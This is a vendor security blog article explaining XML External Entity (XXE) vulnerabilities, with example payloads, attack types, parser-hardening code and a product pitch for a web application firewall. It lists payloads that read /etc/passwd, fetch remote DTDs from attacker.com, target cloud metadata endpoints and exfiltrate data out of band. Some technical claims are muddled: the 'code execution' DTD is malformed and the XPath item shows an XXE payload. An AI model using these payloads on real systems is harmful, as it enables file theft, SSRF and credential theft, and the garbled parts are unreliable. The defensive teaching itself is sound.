Web Application Security

XML External Entity (XXE): How to Identify and Fix Vulnerabilities

8 min read Updated

What Is an XXE Vulnerability?

An XXE (XML External Entity) vulnerability is a security vulnerability in how an application processes XML input. When an XML parser is configured to allow external entity references and the application accepts XML from untrusted sources without proper validation , an attacker can craft malicious XML that forces the parser to read local files, make internal network requests, or execute arbitrary code.

Imagine handing someone a form to fill in, but they write instructions on it instead of data and your system follows those instructions. That is what an XXE vulnerability allows.<
The risk is serious. A single misconfigured XML parser can expose password files, internal server details, cloud metadata, and more. XXE vulnerabilities appear in OWASP’s Top 10 list under A05:2021 – Security Misconfiguration and have been behind some of the largest data breaches in recent history.

What Is an XXE Attack?

An XXE attack exploits an XML external entity vulnerability to make the application’s parser fetch resources it should never touch. The attacker supplies XML with a specially crafted <!DOCTYPE> declaration that defines an external entity pointing to a sensitive file or URL. When the parser processes it, it resolves the entity and returns the contents to the attacker.

An Example of XXE Attack

what is an XXE Attack?

Suppose an application accepts XML input from untrusted sources and uses an XML parser that supports external entities. The application parses an XML file containing user input and returns the results to the user.

<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>

In this XXE example, the XML input defines an external entity “xxe” that points to a local file “/etc/passwd” on the server.

When the XML parser encounters the “xxe” entity reference, it retrieves the local file’s contents and includes it in the parsed XML document. The attacker can then use this technique to read sensitive data stored in the file, such as usernames and passwords.

Alternatively, the attacker can use the following payload to execute arbitrary code on the server:

<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "http://acme.com/payload.dtd">
]>
<foo>&xxe;</foo>

In this example, the XML input defines an external entity “xxe” that points to a remote document type definition (DTD) file “http://acme.com/payload.dtd” controlled by the attacker. The DTD file includes a parameter entity that defines a command to execute arbitrary code on the server, such as:

<!ENTITY % remote SYSTEM "http://acme.com/malware.bin">
<!ENTITY % cmd "<!ENTITY &#x25;#x25; error SYSTEM 'file:///dev/null'>&#x25;#x25;error">

When the XML parser encounters the “xxe” entity reference, it retrieves the contents of the remote DTD file and includes the code in the parsed XML document.

The parser then expands the parameter entity defined in the DTD file, which results in the execution of the arbitrary code defined in the “cmd” entity. The attacker can use this technique to take control of the server and perform malicious activities, such as stealing sensitive data or launching further attacks.

High Profile XXE Hacks

There have been several high-profile breaches over the years that were caused by XXE attacks. Here are some examples:

Apache Tika (CVE-2025-66516, 2025): Rated CVSS 10.0 Critical, this vulnerability affects how Apache Tika processes PDF files containing XFA (XML Forms Architecture) data. The flaw sits in tika-core, not just the PDF module, so any system running tika-core versions 1.13 through 3.2.1 is exposed regardless of how securely the surrounding application code is written. No special configuration or authentication is needed; simply ingesting a malicious PDF triggers the exploit. Since Tika is embedded across hundreds of enterprise workflows including search indexing, ETL pipelines, and document previews, the attack executes silently in the background. This CVE makes a critical point: XXE risk does not sit only in your own code. It lives in every third-party library that parses XML.

SysAid (CVE-2025-2775 and CVE-2025-2776, 2025): Two XXE vulnerabilities in SysAid’s on-premise IT service management platform were added to CISA’s Known Exploited Vulnerabilities catalog, confirming active exploitation in the wild. Both flaws exposed organizations running unpatched SysAid instances to server compromise with no authentication required.GoDaddy (2020): A security researcher found an XXE vulnerability in GoDaddy’s hosting infrastructure that exposed configuration files, environment variables, and internal secrets. GoDaddy patched it shortly after the report.

PayPal (2015): A researcher discovered an XXE flaw in PayPal’s Secure Payments API that allowed OAuth token theft and unauthorized account access. PayPal patched it promptly after responsible disclosure.

Most Common Types of XXE Attacks

Attackers can use several types of External XML Entity attacks to exploit vulnerabilities in XML parsers. Here are some of the most common types of XXE attacks:

1. External Entity Injection

In this type, an attacker injects malicious XML content containing external entities into an XML input field. These entities are then processed by the XML parser, allowing the attacker to read sensitive files, conduct SSRF (Server-Side Request Forgery) attacks, or execute arbitrary code.

External Entity Injection: <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>

2. Parameter Entity Injection

Parameter entity injection occurs when an attacker manipulates parameter entities within the Document Type Definition (DTD) of an XML document. By injecting malicious entities, attackers can achieve outcomes similar to those achieved with external entity injection, such as reading files or executing code.

Parameter Entity Injection: <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "file:///etc/passwd">]>

3. Blind XXE

In blind XXE attacks, the attacker does not receive direct feedback about the existence or content of the files being accessed. Instead, the attacker leverages timing or error-based techniques to infer the attack’s success. Blind XXE attacks are often used when direct retrieval of sensitive data is impossible.

Blind XXE: <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com">]>

4. DTD (Document Type Definition) Manipulation

Attackers can manipulate the DTD to introduce or modify entities, allowing them to control how the XML document is processed. By crafting a malicious DTD, attackers can achieve various goals, including information disclosure, SSRF, and code execution.

DTD Manipulation: <!DOCTYPE foo SYSTEM "http://attacker.com/evil.dtd">

5. Out-of-Band (OOB) XXE

Out-of-Band XXE attacks leverage the ability of the attacker to send data out-of-band, typically over DNS or HTTP, to exfiltrate sensitive information from the target system. This approach is useful when direct data retrieval is impossible due to network restrictions or other limitations.

Out-of-Band (OOB) XXE: <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/dtd.dtd">]>

6. Entity Expansion

In this type of attack, the attacker creates many nested entities in the XML document, causing the XML parser to consume a large amount of memory, potentially leading to a denial of service (DoS)condition.

Entity Expansion: <!DOCTYPE foo [<!ENTITY x "&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;">]>

7. XXE via File Upload

If an application accepts XML files for upload and processes them without proper validation, attackers can upload malicious XML files containing XXE payloads. Upon processing, these payloads can trigger XXE vulnerabilities in the application.

XXE via File Upload: <?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>

8. XPath Injection

XPath is a query language that extracts data from XML documents. In this attack, the attacker injects malicious XPath queries into the XML document, allowing them to extract sensitive data or execute arbitrary code.

XPath Injection: </root><!DOCTYPE test [ <!ENTITY % xxe SYSTEM "file:///etc/passwd"> %xxe; ]>

9. XXE in SOAP Web Services

XML-based SOAP web services are also susceptible to XXE attacks. Attackers can inject malicious XML payloads into SOAP requests, exploiting XXE vulnerabilities in the server-side XML processing logic.

XXE in SOAP Web Services: <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>

XXE Payloads: A Quick Reference

Understanding the payload structure helps both attackers and defenders. Here are the most common XXE payload patterns and what each one does:

Payload Type What It Does
SYSTEM "file:///etc/passwd" Reads a local file from the server filesystem
SYSTEM "http://internal-host/endpoint" Triggers a server-side request (SSRF) to an internal service
SYSTEM "http://attacker.com/dtd.dtd" Loads a remote malicious DTD for advanced exploitation
SYSTEM "file:///proc/self/environ" Reads environment variables, which may contain secrets or API keys
SYSTEM "http://169.254.169.254/latest/meta-data/" Targets AWS instance metadata endpoint to steal cloud credentials
Nested entity expansion (&x;&x;...) Causes exponential memory consumption — denial of service
OOB via DNS (%xxe; in DTD) Exfiltrates data covertly via DNS lookup, bypassing response filtering

When testing for XXE, these payloads are the starting point. When defending, these are exactly what your XML parser configuration should block.

XXE Prevention: How to Stop XXE Attacks

Preventing XML External Entity attacks requires a combination of secure coding practices, proper configuration, and ongoing vigilance. Here are the most effective controls:

1. Disable External Entity Processing

This is the most important fix. Configure every XML parser in your stack to reject external entities and DTD processing entirely.

Java: Disable external entity processing in DocumentBuilderFactory:

factory.setFeature(“http://xml.org/sax/features/external-general-entities”, false);
factory.setFeature(“http://xml.org/sax/features/external-parameter-entities”, false);
factory.setFeature(“http://apache.org/xml/features/disallow-doctype-decl”, true);

.NET: Set XmlReaderSettings to prohibit DTD processing: settings.ProhibitDtd = true;

PHP: Disable entity loading with libxml_disable_entity_loader: libxml_disable_entity_loader(true);

2. Input Validation and Sanitization

Validate all XML input before it reaches the parser. Use allowlisting to define exactly which XML structures, elements, and attributes are permitted. Reject anything outside that definition. Do not try to sanitize malicious XML after the fact.

3. Use Safe XML Parsers

Modern XML libraries include built-in protections. Prefer them over legacy parsers, and keep them updated. An outdated XML library is one of the most common reasons XXE vulnerabilities persist in production.

4. Implement Proper Access Controls

Run XML parsing operations under the least-privileged account possible. Even if an XXE attack succeeds, access controls limit what the parser can read. A parser running as root with full filesystem access is far more dangerous than one running as a restricted service account.

5. Apply Content Security Policies (CSP)

Use CSP to control which external resources, including DTDs  can be loaded by your web application. Strict policies prevent the loading of external entities from untrusted sources, cutting off the remote DTD attack vector.

6. Monitor and Log XML Parsing Activity

Add logging to detect unusual XML parsing behaviour: unexpected external entity declarations, excessive resource consumption, unusual file paths in entity references. Alerts on these patterns can catch XXE attempts in real time before they succeed.

7. Keep a Continuous Patching Cycle

Vulnerability patching must be ongoing, not a one-time event. Security scanners and penetration testers will find new issues as your application evolves. Dedicated remediation sprints not ad hoc fixes  keep your XXE exposure window short.

How to Test for XXE Vulnerabilities

Use Automated Scanning Tools

Run automated DAST (Dynamic Application Security Testing) tools such as Indusface WAS against your application regularly. Automated scanners catch the most common XXE patterns quickly and consistently across all endpoints.

Identify the XML Parser in Use

Know which XML library each service uses. Different parsers have different defaults some disable external entities by default, others do not. Audit your dependencies and check each parser’s configuration explicitly.

Conduct Penetration Testing

Automated tools find common patterns; skilled penetration testers find what automated tools miss. The Indusface WAS Premium plan bundles annual penetration testing and revalidation with the automated scanner. Manual test cases for XXE should include:

  • Basic payload submission: Submit an external entity payload and check if the response contains data from the referenced file or URL.
  • Malicious payload submission: Submit a payload designed to read sensitive files (/etc/passwd, /proc/self/environ) or reach internal services.
  • Error message analysis: Check whether error messages leak XML parser details or partial content from the referenced resource.
  • Blind XXE testing: Submit a payload with an out-of-band callback URL and monitor DNS or HTTP logs for a hit. This confirms the parser resolved the entity even when no data appears in the response.

Re-test after every significant code change. New features often introduce new XML processing paths that inherit old parser configurations.

How to Patch an XXE Vulnerability

Once a vulnerability is confirmed, remediation follows a clear path:

Upgrade the XML parser: If the XML parser being used by the application or system is known to be vulnerable to XXE attacks, upgrade to a more secure version of the parser. Some parsers have options to disable external entity processing, which can help prevent XXE attacks.

Sanitize user input: To prevent malicious input from being included in XML documents, validate, and sanitize all user input before including it in an XML document.

Implement access controls:Implement access controls to limit access to sensitive resources and prevent unauthorized access. This can help mitigate the impact of XXE attacks.

Monitor for suspicious activity: Monitor the application or system for suspicious activity, such as attempts to access sensitive files or execute arbitrary code. This can help find XXE attacks in real-time.

As with the vulnerability detection process, the vulnerability patching must be continuous. With dedicated sprints for patching, you will always be on top of open vulnerabilities that your automated scanners and pen testers find.

How AppTrana WAF Blocks XXE Attacks

Not all XXE vulnerabilities can be patched immediately. Third-party plugins, legacy dependencies, or vendor timelines sometimes mean a code fix is weeks or months away. Virtual patching on the WAF protects the application while the underlying issue is resolved.

AppTrana protects against XXE through five layers:

Signature-based detection: Incoming XML payloads are compared against a continuously updated database of known XXE patterns. Matching requests are blocked before they reach the application.

Protocol validation: AppTrana validates that incoming XML documents conform to the expected schema or DTD. Documents that deviate, including those with unexpected DOCTYPE declarations are blocked.
Input validation: AppTrana scans incoming user input for common XXE payload patterns and blocks requests containing them before they are parsed by the application. Parameterized query enforcement: For database-related XML processing, AppTrana mandates parameterized queries, preventing malicious XML payloads from reaching query execution.
XML parsing protection (on by default): External entity processing is disabled at the WAF layer. This is active from day one, no configuration required.
Stay tuned for more relevant and interesting security articles. Follow Indusface on FacebookTwitter, and LinkedIn.

 

Phani Deepak Akella
Phani Deepak Akella

Phani heads the marketing function at Indusface. He handles product marketing and demand generation. He has worked in the product marketing function for close to a decade and specializes in product launches, sales enablement and partner marketing. In the application security space, Phani has written about web application firewalls, API security solutions, pricing models in application security software and many more topics.

Frequently Asked Questions (FAQs)

XXE and SSRF are distinct vulnerabilities but are often chained together. XXE is a flaw in XML parsing; SSRF is a flaw that allows an attacker to make the server send requests to internal or external URLs. An XXE vulnerability can be used to trigger SSRF by defining an external entity that points to an internal URL, effectively turning a parser flaw into a network-level attack.

An XXE attack works in four steps. First, the attacker identifies an application that accepts XML input. Second, they craft a malicious XML payload containing a DOCTYPE declaration with an external entity pointing to a sensitive resource. Third, they submit the payload to the application. Fourth, the XML parser resolves the entity and returns the contents of the referenced resource, such as a local file or an internal network response.

An attacker who successfully exploits an XXE vulnerability can read sensitive files from the server filesystem, perform server-side request forgery to reach internal services, steal cloud credentials from metadata endpoints, exfiltrate data covertly over DNS or HTTP, and in some cases cause a denial-of-service by triggering exponential entity expansion. In severe cases, XXE can lead to full server compromise.

The most effective way to prevent XXE attacks is to disable external entity processing in your XML parser at the configuration level. In Java, set the relevant DocumentBuilderFactory features to false. In .NET, set ProhibitDtd to true. In PHP, call libxml_disable_entity_loader(true). Beyond parser hardening, validate all XML input, use modern parser libraries with secure defaults, enforce least-privilege access for parsing processes, and use a WAF for virtual patching when a code fix is not immediately possible.

Blind XXE is a variant of XXE attack where the attacker receives no direct output in the application response. Instead, they use out-of-band techniques such as DNS lookups or HTTP callbacks to confirm that the parser resolved the external entity and to exfiltrate data. Blind XXE is harder to detect and is commonly used when the application does not return parsed content to the user.

XML injection involves inserting malicious content into XML data to alter the document structure or application logic, typically targeting the application layer. XXE is a specific type of XML attack that exploits the parser itself by referencing external entities, targeting the infrastructure layer. XXE is generally considered more severe because it can reach the server filesystem and internal network, not just manipulate application data.

Testing for XXE involves submitting crafted XML payloads with external entity references to every endpoint that accepts XML input, including file uploads, API requests, and SOAP services. Submit a payload referencing a local file and check whether the response contains file contents. For blind XXE, use an out-of-band callback server and monitor for DNS or HTTP hits. Automated DAST tools such as Indusface WAS can scan for XXE across all endpoints systematically. Retest after every significant code change.